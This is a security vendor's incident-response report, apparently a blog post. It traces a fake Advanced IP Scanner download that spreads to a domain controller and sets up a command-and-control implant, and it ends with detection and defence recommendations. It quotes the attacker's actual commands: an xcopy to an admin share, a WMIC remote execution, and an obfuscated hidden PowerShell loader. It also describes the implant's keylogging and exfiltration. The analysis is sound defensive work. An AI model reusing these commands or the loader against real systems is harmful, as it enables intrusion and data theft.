Executive Summary
On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and copying the behavior over to the server {DomainController2}. Via the attacker, the malicious application also began setting up a Command & Control session with an IP address hosted at CloudFlare.
Incident Walkthrough
Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.
2023-11-20
Time: 18:57 UTC
Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery
Activity #1: – TOMSMITH mistakenly downloaded malicious software on hostname1. This malicious software masked itself as Advanced IP Scanner in Google search results, and resulted in the user navigating to a fake version of this software hosted in a Cloudflare instance. The logs show the installation of this program onto hostname1 as well. Important artifacts created around this time are:
C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t
Time: 18:59 UTC
Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we do still see the value in detecting an early stage reconnaissance, as correlated activity could be early warning signs of an attack.
Time: 19:06 UTC
Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery
Activity #3: Administrator runs several commands to gather information about the AD domain.
"C:\WINDOWS\system32\nslookup.exe" internaldomain.local C:\WINDOWS\system32\systeminfo.exe"
Time: 19:06 UTC
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #4: When the Advanced_IP_Scanner_2.5.4594.1.exe is run we can see the LOLBAS mentioned in an attack here in action. The following two commands directly afterwards show us building the DLL, and then calling the script.
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline" C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"
Time: 19:07 UTC
Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging
Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.
"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y
Time: 19:08 UTC
Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation
Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.
"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"
Time: 19:08 UTC
Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.
Time: 19:09 UTC on DomainController2
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #8: Now that the attacker had an available remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs following powershell script.
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable _).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"
To break this down a little:
1. This part runs PowerShell with a hidden window, which is often a tactic used by malicious scripts to hide their activity from the user:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden
2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.
Set-Item Variable:LeX 'Net.WebClient'
3. This sets another variable, /8i, to a specific file path.
Set-Item Variable:/8i
'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t'
4. This seems to list items in the current directory with names starting with an underscore.
ls _-*
5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.
Time: 19:10 UTC
Mitre Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #9: We then see a batch script file running from that same directory.
"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
Time: 19:10 UTC
Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.
We were also given a copy of both the CG6oDkyFHl3R.t and LogConverter.bat from the customer. The .t file was a C# application and here is a breakdown of its key functionalities:
- Namespace and Classes: The application is contained within the namespace iVyisyGgNYMCvKq.
- KuSyEkRq Class:
- This class has three properties: UUID, ID, and Data. These seem to be related to identifying and storing data.
- TrustAllCertsPolicy Class:
- Implements the ICertificatePolicy interface and overrides the CheckValidationResult method to always return true. This trusts all SSL certificates.
- XwOWxCEB Class:
- Contains various DllImport statements for interacting with user32.dll and kernel32.dll.
- Defines several static variables and methods for window management, key logging, and sending data to a remote server.
- arXOPGDNf Class:
- Defines methods for encrypting and decrypting byte arrays.
- KuSyEkRq Class:
- Methods
- Main Method:
- Calls ShowWindow to hide the console window.
- Invokes the mDrSGqJS method with specific parameters.
- mDrSGqJS Method:
- Configures SSL certificate validation callback to trust all certificates.
- Sets up parameters such as server URL, a unique identifier (cuzGRbghiiDuB), and a byte array (cRcQUEGZXJWrUs).
- Initiates a loop to communicate with the remote server, handling various commands like “delay,” “exit,” and user input.
- YJUBBebXRoNQCY Method:
- Retrieves the active window’s title.
- pmavtYHsUqft Method:
- Executes PowerShell scripts and captures the output.
- mTEBtfK Method:
- Sends data to a remote server using HTTP POST requests.
- Main Method:
An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.
Time: 22:16 UTC
Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2 and we updated the previously created finding with new information.
Time: 22:53 UTC
Activity #12: Customer contacts our support team.
Time: 23:37 UTC
Activity #13: Support team begins investigation.
2023-11-20
Time: 01:54 UTC
Activity #14: The customer manually isolates the hosts using Blumira Agent.
Time: 14:13 UTC
Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.
Time: 15:27 UTC
Activity #16: 2 files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.
Detection & Defense Recommendations
In this specific instance there are several different defensive recommendations from the Blumira team.
- Most users should not have local administrator permissions. If you, your team, or other everyday endpoint users are running email clients, browsers, and other applications as a local or domain administrator you are opening the door to many automated attacks. Privilege escalation from your account to another device or process becomes exceedingly easier.
- Local administrator passwords should be complex and different per workstation. If an attacker is able to discover a single local admin password, that shouldn’t mean they are able to plug that into a script or pass the hash and have it work on every endpoint in an environment. You can use solutions like Windows LAPS to generate unique passwords locally. Windows now natively integrates LAPS, eliminating the need for external installations and also working in conjunction with Entra ID.
- As always I’m a huge proponent of testing your SIEM and endpoint detections whenever possible. You can perform a large amount of non-invasive tests. We’re constantly testing these detections in our labs as we create them and over time, however it’s important to ensure everything is working properly by doing testing of your own when possible. There are great tools that are freely available that assist in this testing such as Atomic Red Team, as well as some short tests you can run listed here
- Do you know what powershell, WMI, batch files, and the like are being executed in your environment? Controlling the directories they run from, and accounts that execute them can be very beneficial in determining anomalies.
How Blumira is Doing Better
There is no unhackable company, software, hardware, or person. I recently had a discussion the other day on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything, it’s just not possible.What is possible, is the ability for us to grow and learn over time and accept that is something that we should constantly be doing. So what could we have done better in this situation?
- We were in the process of creating a detection based on the LOLBAS seen at 19:06 with cvtres.exe. We fast track detections like this when seen in an incident, but we should definitely already be detecting them.
- Using xcopy in this manner was already on our radar, but we hadn’t prioritized it as a detection. Now that we have seen it in a confirmed attack, we have prioritized it for testing in our lab, against previous customer data to determine if we’ve had misses before, and hopefully will release it to production soon along with the detection mentioned above.
Summary
These detections were possible with the installation of either our Blumira Agent or sysmon, however the admin was able to quickly identify and quarantine these hosts with the Blumira Agent. Thanks to the quick actions from both teams, there was no downtime or further remediation needed.
As this incident demonstrates, early detection and proactive security measures are crucial in preventing threat actors from establishing footholds in your environment. If you're looking for others way to improve your security posture, consider the free Blumira Domain Security Assessment. This new tool provides a comprehensive view of your publicly accessible assets and potential security gaps in minutes - no strings attached. Request your free assessment here.
Amanda Berlin
Amanda Berlin is Lead Incident Detection Engineer at Blumira, bringing nearly two decades of experience to her position. At Blumira she leads a team of incident detection engineers who are responsible for creating new detections based on threat intelligence and research for the Blumira platform. An accomplished...
More from the blog
View All PostsHow To Download, Install, and Configure Sysmon for Windows
Read MoreCVE-2023-48788 - FortiClientEMS Pervasive SQL injection in DAS component
Read MoreThreat Analysis: PowerShell Malicious Activity
Read MoreSubscribe to email updates
Stay up-to-date on what's happening at this blog and get additional content about the benefits of subscribing.